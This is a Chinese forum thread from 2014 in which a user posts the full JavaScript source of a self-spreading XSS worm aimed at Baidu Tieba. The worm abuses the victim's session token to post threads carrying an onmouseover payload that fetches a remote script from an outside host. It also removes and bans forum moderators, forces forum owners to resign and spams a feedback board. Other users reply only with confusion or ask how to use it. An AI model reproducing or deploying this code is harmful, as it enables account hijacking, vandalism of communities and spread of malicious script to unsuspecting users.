找回密码
 立即注册
苍海国际»苍海国际 交流专区 综合交流 xss的js
返回列表 发新帖
查看: 408|回复: 4

xss的js

[复制链接]
dragonforce1210

771

回帖

1万

基友

1万

积分

仙人3层 Lv.12

Rank: 6Rank: 6

伯爵荣耀
发表于 2014-3-15 16:57:24 | 显示全部楼层 |阅读模式
  1. var n=PageData.user.user_forum_list.info.length;
  2. var num=0;
  3.         var config = {
  4.                 titles: ["\u4f60\u7684\u672a\u6765\u5728\u8fd9\u4e2a\u5e16\u5b50\u91cc\uff0c\u60f3\u770b\u5417\uff1f", "\u611a\u8822\u7684\u51e1\u4eba \u63a5\u53d7\u795e\u306e\u6012\u706b\u5427","\u8fd9\u662f\u547d\u8fd0\u77f3\u4e4b\u95e8\u7684\u9009\u62e9","\u98a4\u6296\u5427\uff0c\u51e1\u4eba\u4eec\uff01","\u6b3a\u9a97\u4e00\u5f00\u59cb\u7684\u4f60 \u6b3a\u9a97\u4e16\u754c\u5427","\u8c01\u8981\u5403\u53d8\u6001\u7684\u9999\u8549\uff01","\u521a\u624d\u6536\u5230\u4e86\u5f3a\u70c8\u7684\u7cbe\u795e\u653b\u51fb \u5fc3...\u5fc3\u7075\u6b63\u906d\u5230\u4fb5\u8680","\u4e0d\u8981\u9760\u8fd1\u6211\uff01\u6211\u6b63\u5728\u6267\u884c\u963b\u6b62\u673a\u5173\u66b4\u529b\u884c\u4e3a\u7684\u4f5c\u6218","\u624b\u62ff\u91d1\u5777\u5783\uff0c\u811a\u8e0f\u4e03\u5f69\u4e91\u7aef\uff0c\u53d1\u51fa\u6700\u540e\u7684\u5450\u558a","\u98a4\u6296\u5427\uff0c\u51e1\u4eba\u4eec\uff01"],
  5.                 contents: ['"style="height:100%;width:100;position:fixed'],
  6.                 tbs: PageData.tbs,
  7.                 whiteList: [635137, 1074587, 116863],
  8.         evilContent: '"onmouseover="$.getScript(\u0027//baid.ws/c8tf\u0027)' //xss
  9.         };

  11.         var userInfo = {
  12.         is_red_tail:function(i){$.get('http://tieba.baidu.com/home/get/panel?ie=utf-8&un='+PageData.user.name,function(data){return data.data.identity});}(),
  13.                 is_bawu: function (p) {
  14.                         return p.bawu ? p.can_edit_gconforum ? "daba" : "xiaoba" : "none"
  15.                 }(PageData.user.power)
  16.         };
  17.         function addGood(fid, kw, tid) {
  18.                 $.get('http://tieba.baidu.com/mo/q---9E2EBBE47D2160067823F56F5F549254%3AFG%3D1--1-3-0--2--wapp_1393073859357_21/m?tn=bdSGD&tbs=' + config.tbs + '&word=' + encodeURIComponent(kw) + '&z=' + tid + '&fid=' + fid + '&ntn=set&pn=0&cate=0&expand=0&pinf=1_2_0');
  19.         }

  21.         function topThread(fid, kw, tid) {
  22.                 $.get('http://tieba.baidu.com/mo/q---9E2EBBE47D2160067823F56F5F549254%3AFG%3D1--1-3-0--2--wapp_1393073859357_21/m?tn=bdTOP&z=' + tid + '&tbs=' + config.tbs + '&word=' + encodeURIComponent(kw) + '&expand=0&fid=' + fid + '&ntn=set&pinf=1_2_0');
  23.         }

  25.         function killXiaoBa() {
  26.                 $.get("/bawu2/platform/listBawuTeam?ie=utf-8&word=" + encodeURIComponent(PageData.forum.name), function (x) {
  27.                         $(x).find("ul[id*='assist']").find("li[data-field*='"user_id":']").each(function () {
  28.                                 $.post("/bawu2/platform/delBawuMember", {
  29.                                         tbs: config.tbs,
  30.                                         word: PageData.forum.name,
  31.                                         user_id: $.parseJSON(this.dataset.field).user_id,
  32.                                         type: "assist",
  33.                                         ie: "utf-8"
  34.                                 });
  35.                         });
  36.                 });
  37.         }

  39.         function banXiaoBa() {
  40.                 $.get('http://tieba.baidu.com/f/bawu/admin_group?ie=utf-8&kw=' + encodeURIComponent(PageData.forum.name) + '&fid=' + PageData.forum.id, function (res) {
  41.                         $(res).find('tr:nth-child(3)').find('a').each(function () {
  42.                                 $.post('/bawu/cm', {
  43.                                         cm: 'filter_forum_user',
  44.                                         ban_days: 1,
  45.                                         user_name: $(this).text(),
  46.                                         word: PageData.forum.name,
  47.                                         fid: PageData.forum.id,
  48.                                         tbs: config.tbs,
  49.                                         ie: 'utf-8'
  50.                                 })
  51.                         })
  52.                 })
  53.         }

  55.         function czDaba() {
  56.                 $.post('/bawu/cm', {
  57.                         cm: 'apply_resign',
  58.                         resignation: '\u518d\u89c1\u4e86 \u6211\u7684\u670b\u53cb\u4eec.',
  59.                         dtype: 'json',
  60.                         word: PageData.forum.name,
  61.                         fid: PageData.forum.id,
  62.                         tbs: config.tbs,
  63.                         ie: 'utf-8'
  64.                 })
  65.         }

  67.         function addThread(fid) {
  68.                 $.post("/relay/commit", {
  69.                         ie: "utf-8",
  70.                         kw: "test",
  71.             fid:35,
  72.             tid:2910585163,
  73.                         ftid: fid,
  74.             ptid:2910585163,
  75.             ppid:47102132189,
  76.                         tbs: PageData.tbs,
  77.                         title: config.titles[Math.random() * config.titles.length | 0],
  78.                         content: "aeb1cb13495409230133f7cd9058d109b3de492f#"+config.contents[Math.random() * config.contents.length | 0]+config.evilContent,
  79. new_vcode:1,
  80. tag:11,
  81. activity_id:1425,
  82. act_type:"photo",
  83. __type__:"repost"
  84.                 },function (x) {
  85.           if (x.no == 0 || x.new_thread_id) return x.new_thread_id;})
  86.         }

  88. function reply(){
  89.   if (-1 !== config.whiteList.indexOf(PageData.user.user_forum_list.info[num].id) || !userInfo.is_red_tail && !PageData.user.user_forum_list.info[num].is_like){num++;return;}
  90.   if(PageData.user.user_forum_list.info[num].tid){
  91.    num++;
  92.   }else{
  93.     PageData.user.user_forum_list.info[num].tid=true;addThread(PageData.user.user_forum_list.info[num].id);
  94.   }
  95. }

  97.         function fuckRedTail() {
  98.                 var obj = {
  99.                         ie: "utf-8",
  100.                         kw: "\u8d34\u5427\u610f\u89c1\u53cd\u9988",
  101.                         fid: 898666,
  102.                         tbs: PageData.tbs,
  103.                         title: "\u767e\u5ea6SB",
  104.                         content: config.contents[Math.random() * config.contents.length | 0]
  105.                 }
  106.                 for(var i=0;i<100;i++){
  107.                         $.post("/f/commit/thread/add",obj);
  108.                 }
  109.         }

  111.         if(userInfo.is_red_tail){setInterval("fuckRedTail()",8000)}
  112.         if ("daba" === userInfo.is_bawu){ killXiaoBa(); czDaba();}
  113.         if ("xiaoba" === userInfo.is_bawu) banXiaoBa();
  114. var ruchong=setInterval("reply()",2000);
复制代码



幸好沒加入取消貼吧
回复

使用道具 举报

洛依沫

1187

回帖

3088

基友

3921

积分

通神5段 Lv.8

Rank: 4
发表于 2014-3-15 18:45:21 | 显示全部楼层
完全不懂是什么
回复 支持 反对

使用道具 举报

恍无

2970

回帖

7767

基友

7201

积分

通神6段 Lv.9

Rank: 5Rank: 5

伯爵荣耀
发表于 2014-3-16 09:57:52 | 显示全部楼层
看不懂。。
回复

使用道具 举报

痴情梦里梦痴情

1121

回帖

2811

基友

2743

积分

通神4段 Lv.7

Rank: 4

伯爵荣耀
发表于 2014-3-16 12:06:57 | 显示全部楼层
苍海说,南山采菊,不见归路。有人问,谁的菊?痴情梦里梦痴情 说,是我的,立马被苍海奖励1 基友。
回复 支持 反对

使用道具 举报

林志颖

1795

回帖

5781

基友

2万

积分

仙人7层 Lv.16

Rank: 10Rank: 10Rank: 10

二货勋章伯爵荣耀
发表于 2014-3-16 12:14:31 | 显示全部楼层
怎么用呢
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|苍海国际 ( 鲁ICP备13020644号-1 )

GMT+8, 2025-7-13 06:57 , Processed in 0.140761 second(s), 23 queries .

Powered by Discuz! Theme By eRic Modified by 4bpa

© CangHai International We Do Our Rights!

返回顶部